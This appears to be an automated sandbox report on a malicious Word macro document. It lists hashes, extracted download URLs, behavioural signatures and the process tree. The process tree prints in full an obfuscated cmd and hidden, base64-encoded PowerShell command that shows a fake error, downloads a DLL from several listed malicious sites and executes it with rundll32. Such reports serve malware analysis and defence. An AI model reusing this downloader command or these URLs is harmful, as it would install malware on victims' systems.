Analysis
-
max time kernel
141s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
12-01-2021 20:20
Static task
static1
Behavioral task
behavioral1
Sample
E1-20210112_1959.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
E1-20210112_1959.doc
Resource
win10v20201028
General
-
Target
E1-20210112_1959.doc
-
Size
157KB
-
MD5
512c3b7b2e569cec221339670f9444c6
-
SHA1
413a3f2403985880e8ad0e4d3880c00eeea93c36
-
SHA256
32e85191ad3dfdbc3981cb5cdb0bb35c19721be3604702e8fff800b91b55f854
-
SHA512
e7452bd68bf8c5eeaf58a8f16468ea84bcc0047351dea9525549faffa13112dff97f345296456af544f892f8c3c3a2e753e16830fb6c9d02e83d3241d7500c3c
Malware Config
Extracted
http://baselinealameda.com/j/uoB/
http://abdindash.xyz/b/Yonhx/
https://cavallarigutters.com/samsung-chromebook-etswp/Wdeiub/
https://craku.tech/h/iXbreOs/
https://nicoblogroms.com/c/V9w0b5/
https://www.taradhuay.com/d/oT5uG/
https://altcomconstruction.com/wp-includes/or7/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4000 3660 cmd.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exerundll32.exeflow pid process 25 2160 powershell.exe 30 2836 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 2580 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Vwvool\ndkbt.zqm rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2604 WINWORD.EXE 2604 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exerundll32.exepid process 2160 powershell.exe 2160 powershell.exe 2160 powershell.exe 2836 rundll32.exe 2836 rundll32.exe 2836 rundll32.exe 2836 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2160 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2604 WINWORD.EXE 2604 WINWORD.EXE 2604 WINWORD.EXE 2604 WINWORD.EXE 2604 WINWORD.EXE 2604 WINWORD.EXE 2604 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exepowershell.exerundll32.exerundll32.exedescription pid process target process PID 4000 wrote to memory of 1356 4000 cmd.exe msg.exe PID 4000 wrote to memory of 1356 4000 cmd.exe msg.exe PID 4000 wrote to memory of 2160 4000 cmd.exe powershell.exe PID 4000 wrote to memory of 2160 4000 cmd.exe powershell.exe PID 2160 wrote to memory of 1832 2160 powershell.exe rundll32.exe PID 2160 wrote to memory of 1832 2160 powershell.exe rundll32.exe PID 1832 wrote to memory of 2580 1832 rundll32.exe rundll32.exe PID 1832 wrote to memory of 2580 1832 rundll32.exe rundll32.exe PID 1832 wrote to memory of 2580 1832 rundll32.exe rundll32.exe PID 2580 wrote to memory of 2836 2580 rundll32.exe rundll32.exe PID 2580 wrote to memory of 2836 2580 rundll32.exe rundll32.exe PID 2580 wrote to memory of 2836 2580 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\E1-20210112_1959.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2604
-
C:\Windows\system32\cmd.execmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAEkAdABlAE0AIAAgAHYAQQByAEkAQQBCAEwAZQA6ADMANgA1ACAAKABbAFQAeQBwAGUAXQAoACIAewAxAH0AewAzAH0AewAwAH0AewA1AH0AewAyAH0AewA0AH0AIgAtAEYAJwAuAGkAJwAsACcAUwB5ACcALAAnAHQAbwAnACwAJwBzAFQAZQBtACcALAAnAFIAWQAnACwAJwBPAC4ARABJAHIAZQBDACcAKQApACAAOwAgACQARAA2ADkAMgB3ACAAPQAgACAAWwBUAHkAcABFAF0AKAAiAHsAMwB9AHsAMAB9AHsAOAB9AHsANwB9AHsANQB9AHsAMQB9AHsAMgB9AHsANgB9AHsANAB9ACIAIAAtAGYAJwB5ACcALAAnAEMAJwAsACcARQBwAE8AJwAsACcAUwAnACwAJwByACcALAAnAEUAUgBWAEkAJwAsACcAaQBOAHQATQBBAG4AQQBnAGUAJwAsACcAUwAnACwAJwBTAHQARQBNAC4AbgBFAFQALgAnACkAIAA7ACAAJABWAGYANQBhAHMAaQByAD0AJABFADMAMABMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABBADEAOABFADsAJABXADkANQBSAD0AKAAoACcARQA3ACcAKwAnADMAJwApACsAJwBMACcAKQA7ACAAIAAoAHYAQQBSAEkAYQBCAGwAZQAgADMANgA1ACkALgB2AGEAbABVAEUAOgA6ACIAQwBgAFIAZQBBAGAAVABgAGUAZABJAFIAZQBDAHQAbwBgAFIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdQBHACcAKwAnAE4ATQAnACkAKwAoACcAdgAnACsAJwA4AF8AJwApACsAJwBuACcAKwAoACcAawA3ACcAKwAnAHUARwAnACsAJwBOAEgAXwAnACsAJwBpADQAYgB4ACcAKQArACgAJwBxAHUARwAnACsAJwBOACcAKQApAC4AIgBSAEUAcABsAGAAQQBgAGMARQAiACgAKAAnAHUARwAnACsAJwBOACcAKQAsACcAXAAnACkAKQApADsAJABTAF8ANABCAD0AKAAnAEYANwAnACsAJwAxAEUAJwApADsAIAAgACgAIAAgAGcARQB0AC0AQwBoAEkAbABEAGkAdABFAE0AIAAgACgAIgBWAEEAIgArACIAUgBJAGEAIgArACIAYgBsAGUAOgBkADYAOQAyAFcAIgApACAAIAApAC4AVgBhAEwAVQBFADoAOgAiAFMAZQBgAGMAVQBgAFIAaQBUAFkAUABSAE8AYABUAG8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATAAzADgAUAA9ACgAJwBIADUAJwArACcAMQBMACcAKQA7ACQASQBtAGEANgBhAG8ANQAgAD0AIAAoACcATwAzACcAKwAnADAAQQAnACkAOwAkAEQANQA3AEkAPQAoACcARgAwACcAKwAnADMARwAnACkAOwAkAEsAYwBpADgANAB4ADAAPQAkAEgATwBNAEUAKwAoACgAKAAnAHIAaAAnACsAJwAyACcAKQArACgAJwBNACcAKwAnAHYAOAAnACkAKwAnAF8AJwArACgAJwBuAGsANwByAGgAMgAnACsAJwBIAF8AaQAnACkAKwAoACcANABiACcAKwAnAHgAJwApACsAKAAnAHEAcgBoACcAKwAnADIAJwApACkALgAiAHIAZQBQAGAAbABBAGMAZQAiACgAKAAnAHIAJwArACcAaAAyACcAKQAsACcAXAAnACkAKQArACQASQBtAGEANgBhAG8ANQArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEYAMAA5AFoAPQAoACcATABfACcAKwAnADcARAAnACkAOwAkAFcAZgAwAGcANAB3ADYAPQAoACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAJwArACcAOgAvACcAKQArACcALwAnACsAKAAnAGIAYQBzAGUAJwArACcAbAAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGUAYQAnACkAKwAoACcAbABhAG0AZQAnACsAJwBkAGEALgAnACsAJwBjAG8AbQAnACkAKwAoACcALwBqACcAKwAnAC8AdQBvAEIALwBAAHcAXQB4ACcAKwAnAG0AWwB2ACcAKwAnADoALwAvACcAKwAnAGEAJwApACsAKAAnAGIAZABpACcAKwAnAG4AZAAnACkAKwAoACcAYQAnACsAJwBzAGgALgAnACkAKwAoACcAeAAnACsAJwB5AHoAJwApACsAJwAvACcAKwAoACcAYgAnACsAJwAvAFkAJwApACsAKAAnAG8AbgBoAHgALwBAACcAKwAnAHcAJwArACcAXQAnACkAKwAoACcAeAAnACsAJwBtAFsAdgAnACsAJwBzADoALwAvAGMAJwArACcAYQAnACkAKwAoACcAdgBhAGwAbABhAHIAJwArACcAaQBnAHUAJwArACcAdAB0AGUAJwApACsAKAAnAHIAcwAuACcAKwAnAGMAbwBtACcAKQArACgAJwAvAHMAYQAnACsAJwBtAHMAdQAnACkAKwAoACcAbgBnAC0AJwArACcAYwAnACkAKwAoACcAaAByAG8AbQBlAGIAbwAnACsAJwBvAGsAJwArACcALQAnACsAJwBlAHQAcwAnACsAJwB3AHAAJwArACcALwAnACkAKwAoACcAVwBkAGUAJwArACcAaQB1AGIAJwApACsAJwAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAbQAnACsAJwBbAHYAcwA6ACcAKwAnAC8ALwBjACcAKQArACgAJwByACcAKwAnAGEAawB1AC4AJwArACcAdABlAGMAaAAvAGgAJwApACsAKAAnAC8AaQAnACsAJwBYAGIAcgAnACsAJwBlAE8AJwApACsAJwBzAC8AJwArACgAJwBAAHcAJwArACcAXQB4AG0AWwB2ACcAKwAnAHMAOgAvAC8AbgBpACcAKwAnAGMAJwApACsAJwBvACcAKwAoACcAYgAnACsAJwBsAG8AZwByAG8AbQAnACkAKwAoACcAcwAuAGMAJwArACcAbwBtAC8AYwAvAFYAJwArACcAOQB3ADAAYgAnACkAKwAoACcANQAvAEAAdwBdAHgAJwArACcAbQAnACsAJwBbACcAKQArACgAJwB2ACcAKwAnAHMAOgAvACcAKQArACgAJwAvACcAKwAnAHcAdwAnACsAJwB3AC4AdABhACcAKQArACgAJwByACcAKwAnAGEAZAAnACkAKwAoACcAaAB1AGEAJwArACcAeQAnACkAKwAnAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAGQAJwArACcALwBvAFQANQB1ACcAKwAnAEcALwAnACsAJwBAAHcAXQB4AG0AWwAnACkAKwAnAHYAJwArACcAcwA6ACcAKwAoACcALwAnACsAJwAvAGEAbAB0ACcAKwAnAGMAbwBtAGMAbwAnACsAJwBuACcAKQArACgAJwBzAHQAcgB1ACcAKwAnAGMAJwArACcAdAAnACkAKwAoACcAaQBvAG4ALgBjAG8AJwArACcAbQAnACsAJwAvACcAKQArACgAJwB3AHAAJwArACcALQBpAG4AYwBsACcAKQArACgAJwB1AGQAZQAnACsAJwBzAC8AJwApACsAKAAnAG8AJwArACcAcgA3ACcAKQArACcALwAnACkALgAiAFIAYABlAHAAbABhAEMAZQAiACgAKAAoACcAdwAnACsAJwBdAHgAJwApACsAJwBtAFsAJwArACcAdgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkACcAKwAnAHMAZQB3ACcAKQArACcAZgAnACkALAAoACgAJwB3AGUAJwArACcAdgB3ACcAKQArACcAZQAnACkAKQAsACgAKAAnAGEAJwArACcAZQBmACcAKQArACcAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBzAGAAUABMAGkAVAAiACgAJABSADEAMABXACAAKwAgACQAVgBmADUAYQBzAGkAcgAgACsAIAAkAFUANwA5AFoAKQA7ACQATgAyADQAUQA9ACgAJwBWACcAKwAoACcAXwA4ACcAKwAnAEMAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEMAXwA1AHoANwBqAHkAIABpAG4AIAAkAFcAZgAwAGcANAB3ADYAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4AbgBFAHQALgB3AEUAQgBjAGwASQBFAE4AVAApAC4AIgBkAE8AdwBgAE4ATABPAGEARABgAEYAaQBMAGUAIgAoACQAQwBfADUAegA3AGoAeQAsACAAJABLAGMAaQA4ADQAeAAwACkAOwAkAFAAXwA2AEMAPQAoACgAJwBLADcAJwArACcAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEsAYwBpADgANAB4ADAAKQAuACIATABlAG4ARwBgAFQASAAiACAALQBnAGUAIAA0ADkAOQA3ADIAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQASwBjAGkAOAA0AHgAMAAsACgAKAAnAFMAaABvAHcAJwArACcARABpACcAKQArACcAYQAnACsAJwBsACcAKwAoACcAbwAnACsAJwBnAEEAJwApACkALgAiAFQAbwBzAGAAVABgAFIASQBuAEcAIgAoACkAOwAkAFEAOAAyAFQAPQAoACcATwA5ACcAKwAnAF8ARwAnACkAOwBiAHIAZQBhAGsAOwAkAEMAMwA3AFoAPQAoACcATgAyACcAKwAnADgATwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgANQA0AEgAPQAoACgAJwBPADkAJwArACcAMwAnACkAKwAnAFoAJwApAA==1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵PID:1356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -enc IABTAGUAVAAtAEkAdABlAE0AIAAgAHYAQQByAEkAQQBCAEwAZQA6ADMANgA1ACAAKABbAFQAeQBwAGUAXQAoACIAewAxAH0AewAzAH0AewAwAH0AewA1AH0AewAyAH0AewA0AH0AIgAtAEYAJwAuAGkAJwAsACcAUwB5ACcALAAnAHQAbwAnACwAJwBzAFQAZQBtACcALAAnAFIAWQAnACwAJwBPAC4ARABJAHIAZQBDACcAKQApACAAOwAgACQARAA2ADkAMgB3ACAAPQAgACAAWwBUAHkAcABFAF0AKAAiAHsAMwB9AHsAMAB9AHsAOAB9AHsANwB9AHsANQB9AHsAMQB9AHsAMgB9AHsANgB9AHsANAB9ACIAIAAtAGYAJwB5ACcALAAnAEMAJwAsACcARQBwAE8AJwAsACcAUwAnACwAJwByACcALAAnAEUAUgBWAEkAJwAsACcAaQBOAHQATQBBAG4AQQBnAGUAJwAsACcAUwAnACwAJwBTAHQARQBNAC4AbgBFAFQALgAnACkAIAA7ACAAJABWAGYANQBhAHMAaQByAD0AJABFADMAMABMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABBADEAOABFADsAJABXADkANQBSAD0AKAAoACcARQA3ACcAKwAnADMAJwApACsAJwBMACcAKQA7ACAAIAAoAHYAQQBSAEkAYQBCAGwAZQAgADMANgA1ACkALgB2AGEAbABVAEUAOgA6ACIAQwBgAFIAZQBBAGAAVABgAGUAZABJAFIAZQBDAHQAbwBgAFIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdQBHACcAKwAnAE4ATQAnACkAKwAoACcAdgAnACsAJwA4AF8AJwApACsAJwBuACcAKwAoACcAawA3ACcAKwAnAHUARwAnACsAJwBOAEgAXwAnACsAJwBpADQAYgB4ACcAKQArACgAJwBxAHUARwAnACsAJwBOACcAKQApAC4AIgBSAEUAcABsAGAAQQBgAGMARQAiACgAKAAnAHUARwAnACsAJwBOACcAKQAsACcAXAAnACkAKQApADsAJABTAF8ANABCAD0AKAAnAEYANwAnACsAJwAxAEUAJwApADsAIAAgACgAIAAgAGcARQB0AC0AQwBoAEkAbABEAGkAdABFAE0AIAAgACgAIgBWAEEAIgArACIAUgBJAGEAIgArACIAYgBsAGUAOgBkADYAOQAyAFcAIgApACAAIAApAC4AVgBhAEwAVQBFADoAOgAiAFMAZQBgAGMAVQBgAFIAaQBUAFkAUABSAE8AYABUAG8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATAAzADgAUAA9ACgAJwBIADUAJwArACcAMQBMACcAKQA7ACQASQBtAGEANgBhAG8ANQAgAD0AIAAoACcATwAzACcAKwAnADAAQQAnACkAOwAkAEQANQA3AEkAPQAoACcARgAwACcAKwAnADMARwAnACkAOwAkAEsAYwBpADgANAB4ADAAPQAkAEgATwBNAEUAKwAoACgAKAAnAHIAaAAnACsAJwAyACcAKQArACgAJwBNACcAKwAnAHYAOAAnACkAKwAnAF8AJwArACgAJwBuAGsANwByAGgAMgAnACsAJwBIAF8AaQAnACkAKwAoACcANABiACcAKwAnAHgAJwApACsAKAAnAHEAcgBoACcAKwAnADIAJwApACkALgAiAHIAZQBQAGAAbABBAGMAZQAiACgAKAAnAHIAJwArACcAaAAyACcAKQAsACcAXAAnACkAKQArACQASQBtAGEANgBhAG8ANQArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEYAMAA5AFoAPQAoACcATABfACcAKwAnADcARAAnACkAOwAkAFcAZgAwAGcANAB3ADYAPQAoACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAJwArACcAOgAvACcAKQArACcALwAnACsAKAAnAGIAYQBzAGUAJwArACcAbAAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGUAYQAnACkAKwAoACcAbABhAG0AZQAnACsAJwBkAGEALgAnACsAJwBjAG8AbQAnACkAKwAoACcALwBqACcAKwAnAC8AdQBvAEIALwBAAHcAXQB4ACcAKwAnAG0AWwB2ACcAKwAnADoALwAvACcAKwAnAGEAJwApACsAKAAnAGIAZABpACcAKwAnAG4AZAAnACkAKwAoACcAYQAnACsAJwBzAGgALgAnACkAKwAoACcAeAAnACsAJwB5AHoAJwApACsAJwAvACcAKwAoACcAYgAnACsAJwAvAFkAJwApACsAKAAnAG8AbgBoAHgALwBAACcAKwAnAHcAJwArACcAXQAnACkAKwAoACcAeAAnACsAJwBtAFsAdgAnACsAJwBzADoALwAvAGMAJwArACcAYQAnACkAKwAoACcAdgBhAGwAbABhAHIAJwArACcAaQBnAHUAJwArACcAdAB0AGUAJwApACsAKAAnAHIAcwAuACcAKwAnAGMAbwBtACcAKQArACgAJwAvAHMAYQAnACsAJwBtAHMAdQAnACkAKwAoACcAbgBnAC0AJwArACcAYwAnACkAKwAoACcAaAByAG8AbQBlAGIAbwAnACsAJwBvAGsAJwArACcALQAnACsAJwBlAHQAcwAnACsAJwB3AHAAJwArACcALwAnACkAKwAoACcAVwBkAGUAJwArACcAaQB1AGIAJwApACsAJwAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAbQAnACsAJwBbAHYAcwA6ACcAKwAnAC8ALwBjACcAKQArACgAJwByACcAKwAnAGEAawB1AC4AJwArACcAdABlAGMAaAAvAGgAJwApACsAKAAnAC8AaQAnACsAJwBYAGIAcgAnACsAJwBlAE8AJwApACsAJwBzAC8AJwArACgAJwBAAHcAJwArACcAXQB4AG0AWwB2ACcAKwAnAHMAOgAvAC8AbgBpACcAKwAnAGMAJwApACsAJwBvACcAKwAoACcAYgAnACsAJwBsAG8AZwByAG8AbQAnACkAKwAoACcAcwAuAGMAJwArACcAbwBtAC8AYwAvAFYAJwArACcAOQB3ADAAYgAnACkAKwAoACcANQAvAEAAdwBdAHgAJwArACcAbQAnACsAJwBbACcAKQArACgAJwB2ACcAKwAnAHMAOgAvACcAKQArACgAJwAvACcAKwAnAHcAdwAnACsAJwB3AC4AdABhACcAKQArACgAJwByACcAKwAnAGEAZAAnACkAKwAoACcAaAB1AGEAJwArACcAeQAnACkAKwAnAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAGQAJwArACcALwBvAFQANQB1ACcAKwAnAEcALwAnACsAJwBAAHcAXQB4AG0AWwAnACkAKwAnAHYAJwArACcAcwA6ACcAKwAoACcALwAnACsAJwAvAGEAbAB0ACcAKwAnAGMAbwBtAGMAbwAnACsAJwBuACcAKQArACgAJwBzAHQAcgB1ACcAKwAnAGMAJwArACcAdAAnACkAKwAoACcAaQBvAG4ALgBjAG8AJwArACcAbQAnACsAJwAvACcAKQArACgAJwB3AHAAJwArACcALQBpAG4AYwBsACcAKQArACgAJwB1AGQAZQAnACsAJwBzAC8AJwApACsAKAAnAG8AJwArACcAcgA3ACcAKQArACcALwAnACkALgAiAFIAYABlAHAAbABhAEMAZQAiACgAKAAoACcAdwAnACsAJwBdAHgAJwApACsAJwBtAFsAJwArACcAdgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkACcAKwAnAHMAZQB3ACcAKQArACcAZgAnACkALAAoACgAJwB3AGUAJwArACcAdgB3ACcAKQArACcAZQAnACkAKQAsACgAKAAnAGEAJwArACcAZQBmACcAKQArACcAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBzAGAAUABMAGkAVAAiACgAJABSADEAMABXACAAKwAgACQAVgBmADUAYQBzAGkAcgAgACsAIAAkAFUANwA5AFoAKQA7ACQATgAyADQAUQA9ACgAJwBWACcAKwAoACcAXwA4ACcAKwAnAEMAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEMAXwA1AHoANwBqAHkAIABpAG4AIAAkAFcAZgAwAGcANAB3ADYAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4AbgBFAHQALgB3AEUAQgBjAGwASQBFAE4AVAApAC4AIgBkAE8AdwBgAE4ATABPAGEARABgAEYAaQBMAGUAIgAoACQAQwBfADUAegA3AGoAeQAsACAAJABLAGMAaQA4ADQAeAAwACkAOwAkAFAAXwA2AEMAPQAoACgAJwBLADcAJwArACcAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEsAYwBpADgANAB4ADAAKQAuACIATABlAG4ARwBgAFQASAAiACAALQBnAGUAIAA0ADkAOQA3ADIAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQASwBjAGkAOAA0AHgAMAAsACgAKAAnAFMAaABvAHcAJwArACcARABpACcAKQArACcAYQAnACsAJwBsACcAKwAoACcAbwAnACsAJwBnAEEAJwApACkALgAiAFQAbwBzAGAAVABgAFIASQBuAEcAIgAoACkAOwAkAFEAOAAyAFQAPQAoACcATwA5ACcAKwAnAF8ARwAnACkAOwBiAHIAZQBhAGsAOwAkAEMAMwA3AFoAPQAoACcATgAyACcAKwAnADgATwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgANQA0AEgAPQAoACgAJwBPADkAJwArACcAMwAnACkAKwAnAFoAJwApAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Mv8_nk7\H_i4bxq\O30A.dll,ShowDialogA3⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Mv8_nk7\H_i4bxq\O30A.dll,ShowDialogA4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vwvool\ndkbt.zqm",ShowDialogA5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2836
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
13fd7b66aa0d9a9ae61ae47853352e5f
SHA10bda51b70d8f86dde426eb85d0a7c65a06041490
SHA256e51dc03253743b5e405e7fb170e04cecdd0573798d8b6298374dbdd505bff4e4
SHA5127fd26a7f02e3cb57fc095275b7a27539c67e750fd0ebfe8ff50175fc159d5c65f7ef2953183ae928089ae258df6e6ed8367f435dae014a6f23ed5c87324905ca
-
MD5
13fd7b66aa0d9a9ae61ae47853352e5f
SHA10bda51b70d8f86dde426eb85d0a7c65a06041490
SHA256e51dc03253743b5e405e7fb170e04cecdd0573798d8b6298374dbdd505bff4e4
SHA5127fd26a7f02e3cb57fc095275b7a27539c67e750fd0ebfe8ff50175fc159d5c65f7ef2953183ae928089ae258df6e6ed8367f435dae014a6f23ed5c87324905ca